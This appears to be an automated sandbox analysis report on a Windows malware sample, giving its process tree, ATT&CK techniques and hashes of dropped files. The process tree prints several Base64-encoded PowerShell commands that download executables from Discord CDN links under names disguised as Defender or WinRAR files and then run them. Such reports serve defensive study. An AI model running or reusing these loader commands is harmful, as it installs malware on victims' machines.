C:\Users\Admin\AppData\Local\Temp\u1dgvDBSp9.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdABtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADIANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADEAMQA3ADMANwA2ADgAMQAyADAAMgA0ADYANAAxADMALwAxADAANQAxADEANwA1ADMAMAA3ADUAMAA1ADMAMQA5ADkANgA2AC8AVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AHQAUwBjAHIAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAaQBrAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB3AG4AaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBoAHAAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAE4AWABBAFMAMQAyADMALgBlAHgAZQAnACkAKQA8ACMAcAByAHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeABsAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGsAcgByACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0ATgBYAEEAUwAxADIAMwAuAGUAeABlACcAKQA8ACMAeABhAGwAIwA+AA=="
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3104

C:\Users\Admin\AppData\Roaming\MNXAS123.exe
"C:\Users\Admin\AppData\Roaming\MNXAS123.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4932

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\yTJoK2omPR.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2520

C:\Users\Admin\AppData\Local\Temp\yTJoK2omPR.exe
C:\Users\Admin\AppData\Local\Temp\yTJoK2omPR.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAdQBuACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADEAMQA3ADMANwA2ADgAMQAyADAAMgA0ADYANAAxADMALwAxADAANQAxADEANwA1ADMAMgA5ADMAMgA4ADIANwA5ADUAOQAzAC8AaQBvAGQAaQBwAHAAYwBtAG0AbAAuAGUAeABlACcALAAgADwAIwB1AGwAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHIAZQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAegBrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATwBNAE4AWgBYAEMAQgA2ADkALgBlAHgAZQAnACkAKQA8ACMAZwB0AGcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagBoAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAbAB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATwBNAE4AWgBYAEMAQgA2ADkALgBlAHgAZQAnACkAPAAjAHYAcwB1ACMAPgA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3308

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\f3ERcAfAXH.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3392

C:\Users\Admin\AppData\Local\Temp\f3ERcAfAXH.exe
C:\Users\Admin\AppData\Local\Temp\f3ERcAfAXH.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3160

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\3p3NPb03al.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4720

C:\Users\Admin\AppData\Local\Temp\3p3NPb03al.exe
C:\Users\Admin\AppData\Local\Temp\3p3NPb03al.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAdwBxACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADAAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADEAMQA3ADMANwA2ADgAMQAyADAAMgA0ADYANAAxADMALwAxADAANQAxADEANwA1ADMANQA2ADYAOAA3ADcAMgA0ADUAOAA0AC8ARABlAGYAZQBuAGQAZQByAFMAYwByAGUAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAawBlAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AHEAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGIAbgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAE8AVQBBAFMARABCAE4AQwAuAGUAeABlACcAKQApADwAIwBzAHQAcwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBiAHMAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQB6AG0AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABPAFUAQQBTAEQAQgBOAEMALgBlAHgAZQAnACkAPAAjAHcAZABoACMAPgA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3780

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\GxkmQwLmRs.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3432

C:\Users\Admin\AppData\Local\Temp\GxkmQwLmRs.exe
C:\Users\Admin\AppData\Local\Temp\GxkmQwLmRs.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAbQBzACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADIANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADEAMQA3ADMANwA2ADgAMQAyADAAMgA0ADYANAAxADMALwAxADAANQAxADEANwA1ADMANwA0ADkAOQA1ADgANQA3ADQANgA4AC8AVwBpAG4AZABvAHcAcwBTAGgAZQBlAGwASABvAHMALgBlAHgAZQAnACwAIAA8ACMAegBnAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBnAGcAcgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHkAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBCAFgAWgBDAEsATABBADgAOQAyADEALgBlAHgAZQAnACkAKQA8ACMAYQBnAGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgB4AHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHUAZwBrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEIAWABaAEMASwBMAEEAOAA5ADIAMQAuAGUAeABlACcAKQA8ACMAbgBtAHIAIwA+AA=="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4924

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\8t8gpkjJCf.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:388

C:\Users\Admin\AppData\Local\Temp\8t8gpkjJCf.exe
C:\Users\Admin\AppData\Local\Temp\8t8gpkjJCf.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:2908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAbABrACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADEAMQA3ADMANwA2ADgAMQAyADAAMgA0ADYANAAxADMALwAxADAANQAxADEANwA1ADQAMAA1ADEANgA5ADYAOAA0ADQAOQAwAC8AdwBJAE4AUgBBAFIAXwBwAHIAbwB0AGUAYwB0AGUAZAAuAGUAeABlACcALAAgADwAIwBqAGQAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAYwB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAdgBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0AWABaAEwAQQBIADEAMgAzADIALgBlAHgAZQAnACkAKQA8ACMAYgBqAGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdAB5AGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGIAawBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0AWABaAEwAQQBIADEAMgAzADIALgBlAHgAZQAnACkAPAAjAG0AdgBmACMAPgA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAeABlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADEAMQA3ADMANwA2ADgAMQAyADAAMgA0ADYANAAxADMALwAxADAANQAxADEANwA1ADIAOAA2ADcANAA3ADcAMAA5ADUANwAyAC8AVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AHQAUwBjAHIAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAZQB1AG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAGEAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAGYAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAE8ARABTAEYAQgAxAC4AZQB4AGUAJwApACkAPAAjAHMAcABzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAZQB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAGwAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAE8ARABTAEYAQgAxAC4AZQB4AGUAJwApADwAIwBzAHUAaQAjAD4A"
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852

C:\Users\Admin\AppData\Roaming\PODSFB1.exe
"C:\Users\Admin\AppData\Roaming\PODSFB1.exe"
2⤵
- Executes dropped EXE
PID:4876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 808
3⤵
- Program crash
PID:3632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcABqACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADcANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADEAMQA3ADMANwA2ADgAMQAyADAAMgA0ADYANAAxADMALwAxADAANQAxADEANwA1ADMANAAwADkAMwAzADkAMQAwADUANAA4AC8AVwBDAHIAbwBuAFMAZQBjAHUAcgBpAHQAeQBfAHAAcgBvAHQAZQBjAHQAZQBkAC4AZQB4AGUAJwAsACAAPAAjAHYAegBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAawByAGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABsAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABLAEMAWgBYAEIATgBNADkAMQAuAGUAeABlACcAKQApADwAIwBxAHkAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHEAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABLAEMAWgBYAEIATgBNADkAMQAuAGUAeABlACcAKQA8ACMAZQBpAHYAIwA+AA=="
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4804

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 099c1ec572ec7146c55b726802a2b6f5 rSJFR6IRIUGitiZufx5i+A.0.1.0.0.0
1⤵
- Suspicious use of WriteProcessMemory
PID:2564

C:\Users\Admin\AppData\Roaming\HDJ3.exe
C:\Users\Admin\AppData\Roaming\HDJ3.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2128

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
PID:3936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4876 -ip 4876
1⤵
PID:1484

C:\Users\Admin\AppData\Roaming\FDJSDC41.exe
C:\Users\Admin\AppData\Roaming\FDJSDC41.exe
1⤵
- Executes dropped EXE
PID:3188

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FDJSDC41.exe.log
Filesize
902B

MD5
317ed182314a105b8436cfd8bb3879f6

SHA1
aa407b44619a9b06b18d8a39ce27a65b959598e1

SHA256
34a156e5235a27901293bd8928b37d13724d62183e409f6d284110280c56f865

SHA512
27bc617005ef36be6384484e5cec56d7165d1e9535c9a0b5546f1f082cc4bf5969acb573da77171ac7f4119c8cf50a3ced103cd21485569c9cfcf2e340468604

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HDJ3.exe.log
Filesize
902B

MD5
317ed182314a105b8436cfd8bb3879f6

SHA1
aa407b44619a9b06b18d8a39ce27a65b959598e1

SHA256
34a156e5235a27901293bd8928b37d13724d62183e409f6d284110280c56f865

SHA512
27bc617005ef36be6384484e5cec56d7165d1e9535c9a0b5546f1f082cc4bf5969acb573da77171ac7f4119c8cf50a3ced103cd21485569c9cfcf2e340468604

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
00e58f368649eca5caa1a16e72386a57

SHA1
1c5e0dc46d6bba4ddd8e3ce4e2aca83950434635

SHA256
c4c309d45ade44494c6f586774623c99621a7cda17a743aa0ba82a23850ccba7

SHA512
37bcc4171624838457d146b21157eb2771d94637a3b89f57ab2fcf9be10baff16ef9fc97cf77fb6bf9490806561be5c36c3ab52553cd57d9d872d26e89defaa0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
00e58f368649eca5caa1a16e72386a57

SHA1
1c5e0dc46d6bba4ddd8e3ce4e2aca83950434635

SHA256
c4c309d45ade44494c6f586774623c99621a7cda17a743aa0ba82a23850ccba7

SHA512
37bcc4171624838457d146b21157eb2771d94637a3b89f57ab2fcf9be10baff16ef9fc97cf77fb6bf9490806561be5c36c3ab52553cd57d9d872d26e89defaa0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6f3a85adc8d2b7ca35e15b70ffd8038f

SHA1
3a6d5c37659f11fb6e23ecf88900708e66744f0a

SHA256
5362861931db904fa320de83ff5eac48eb76d9c4bc135d568585d13342b1b139

SHA512
9376d6a7500c95e053df6df77b77bdb477fdc7ca7d1ca7099021cc96cbb94e7f63a137b5c68ee1a5d3811da042062cd35ef73837f3bae4893ce47f196572b00a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d50cd63979892f5d6e586865239d73c1

SHA1
6723c94fc0c4a3540ed855a78a863943a1c5a278

SHA256
d5f498da9c5d658d04763a63280743da57dbb70347bcd4c2224f4c4d1f2e938c

SHA512
d1c2c89d8472de243e76bfb8441aada84d2900bf94a3db3625d724a5540feacc4616ee8de2aec525d412bae61ef1b226917ac56ca59e7dcddf60135580ef777e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d50cd63979892f5d6e586865239d73c1

SHA1
6723c94fc0c4a3540ed855a78a863943a1c5a278

SHA256
d5f498da9c5d658d04763a63280743da57dbb70347bcd4c2224f4c4d1f2e938c

SHA512
d1c2c89d8472de243e76bfb8441aada84d2900bf94a3db3625d724a5540feacc4616ee8de2aec525d412bae61ef1b226917ac56ca59e7dcddf60135580ef777e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
fba50434e6877e3250e146795307e55d

SHA1
2e827f79afb64eab143147f78773ab59641e19d1

SHA256
b484ed5106b953d6181c337878750c01c57c9b004bf697dcf46b3ee02fb8539e

SHA512
4b893e9c28f7c51dfbe73d730bed566d2db73727cd1b43f6317af49bfdf6018979ce884920750183809b5923dfb3634a5cf6a91193eb1e4577093d4e5c561d0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ec484f5eba2f29de745101dfa991b523

SHA1
7c21ecc9206a1a9162f399a6034881f45947b340

SHA256
a64ce3f37231c19aed671a3f57c9be4faf8980fd9aff3c683fa3565abdcdedc2

SHA512
564252e7a8d5f95b8e047d9469b11ef45074a102a10fc20a22df1b7aabf089015854b632dbf6a62d3176b5543dc9cf11d66418b71220535207211569a38c9d32

Download Submit
C:\Users\Admin\AppData\Local\Temp\3p3NPb03al.exe
Filesize
6KB

MD5
786f37c13f55a1efd95445a056e1f2ad

SHA1
4f386ba4b4512654bf9b95564b96568eb439dec2

SHA256
8f83f501fc500d0042f433b1665c36445f425695d500e539b91ba0175c8419c5

SHA512
806880559eb005f5bc948c13f04e1ab39e000dc9c47dd19b1147db9554d8356aeb2831cbb73dd3331336e49699b994c90f801f03478622cd30a283183f06a813

Download Submit
C:\Users\Admin\AppData\Local\Temp\3p3NPb03al.exe
Filesize
6KB

MD5
786f37c13f55a1efd95445a056e1f2ad

SHA1
4f386ba4b4512654bf9b95564b96568eb439dec2

SHA256
8f83f501fc500d0042f433b1665c36445f425695d500e539b91ba0175c8419c5

SHA512
806880559eb005f5bc948c13f04e1ab39e000dc9c47dd19b1147db9554d8356aeb2831cbb73dd3331336e49699b994c90f801f03478622cd30a283183f06a813

Download Submit
C:\Users\Admin\AppData\Local\Temp\8t8gpkjJCf.exe
Filesize
6KB

MD5
d8c489387b4897ddfc2b2cef00549806

SHA1
b90763f4ba01094b2ead4c4f1fec8d3f9b65d764

SHA256
99749cdda22e3e89f1f96abe450a050e4fc7398810809c0a50ac0b5767ba8bab

SHA512
e810daa7bc95b326dc1f533e4995e99bae08d32aa69d7618fa4bb672b8a26c70e46c0e7628e41eb94ec45f5ef032e24030c1e20471736cc799a0a37ccf0c4910

Download Submit
C:\Users\Admin\AppData\Local\Temp\8t8gpkjJCf.exe
Filesize
6KB

MD5
d8c489387b4897ddfc2b2cef00549806

SHA1
b90763f4ba01094b2ead4c4f1fec8d3f9b65d764

SHA256
99749cdda22e3e89f1f96abe450a050e4fc7398810809c0a50ac0b5767ba8bab

SHA512
e810daa7bc95b326dc1f533e4995e99bae08d32aa69d7618fa4bb672b8a26c70e46c0e7628e41eb94ec45f5ef032e24030c1e20471736cc799a0a37ccf0c4910

Download Submit
C:\Users\Admin\AppData\Local\Temp\GxkmQwLmRs.exe
Filesize
6KB

MD5
e4bd163dd1ff713b9575a1827c55c6b6

SHA1
c2e8de6ade90473b25d5cbca7415c450a58333be

SHA256
6e31059bba93c4917d97b72ecdc54c100a5578b935e57d6702d311e3a953b78a

SHA512
084c2cf6e111067acb5ebe37549f024dd9d8374fbc6e097661927f29221efb799d063ef825152d9a7aa28bad845cf24df7b9eab321d46d08a44706e3394d3eca

Download Submit
C:\Users\Admin\AppData\Local\Temp\GxkmQwLmRs.exe
Filesize
6KB

MD5
e4bd163dd1ff713b9575a1827c55c6b6

SHA1
c2e8de6ade90473b25d5cbca7415c450a58333be

SHA256
6e31059bba93c4917d97b72ecdc54c100a5578b935e57d6702d311e3a953b78a

SHA512
084c2cf6e111067acb5ebe37549f024dd9d8374fbc6e097661927f29221efb799d063ef825152d9a7aa28bad845cf24df7b9eab321d46d08a44706e3394d3eca

Download Submit
C:\Users\Admin\AppData\Local\Temp\MJBI24ctOq.exe
Filesize
5KB

MD5
b1492c420aa22abfdfd5a82b3b0ce932

SHA1
c5bf09d2f3c71ef2fcda55b863dabdc7b4b4675b

SHA256
4db3b67780d90d88a711c526c3c021b1f17f68fd8ec60e2bbb0ad56f7e672a89

SHA512
ee039aa134a61a75fe0bff6ecfb7a9367f99315eb94906501a3db1f1bcfb4082bc698270d4b7fc9366ea4a380db39fe4dd9141ac4b037af12af0e7214c063312

Download Submit
C:\Users\Admin\AppData\Local\Temp\MJBI24ctOq.exe
Filesize
5KB

MD5
b1492c420aa22abfdfd5a82b3b0ce932

SHA1
c5bf09d2f3c71ef2fcda55b863dabdc7b4b4675b

SHA256
4db3b67780d90d88a711c526c3c021b1f17f68fd8ec60e2bbb0ad56f7e672a89

SHA512
ee039aa134a61a75fe0bff6ecfb7a9367f99315eb94906501a3db1f1bcfb4082bc698270d4b7fc9366ea4a380db39fe4dd9141ac4b037af12af0e7214c063312

Download Submit
C:\Users\Admin\AppData\Local\Temp\RerLvnKXzV.exe
Filesize
5KB

MD5
3615a536f807d9df581dd22a69384f93

SHA1
3ab3e0f84e8d22c4b73e510d9c3d7f2ebc030434

SHA256
e3a3f8efb3c30c323316c5e25b73464af9e5fa89962f8b165f5a625f8e0b0785

SHA512
a7d713b349236898dd9f40b050d02330788b6e4462cefaf871506cf3251830fbcc328078853861a8e3c007fa33d1e509ef25cc841753c1bad9ef45ca8c022069

Download Submit
C:\Users\Admin\AppData\Local\Temp\RerLvnKXzV.exe
Filesize
5KB

MD5
3615a536f807d9df581dd22a69384f93

SHA1
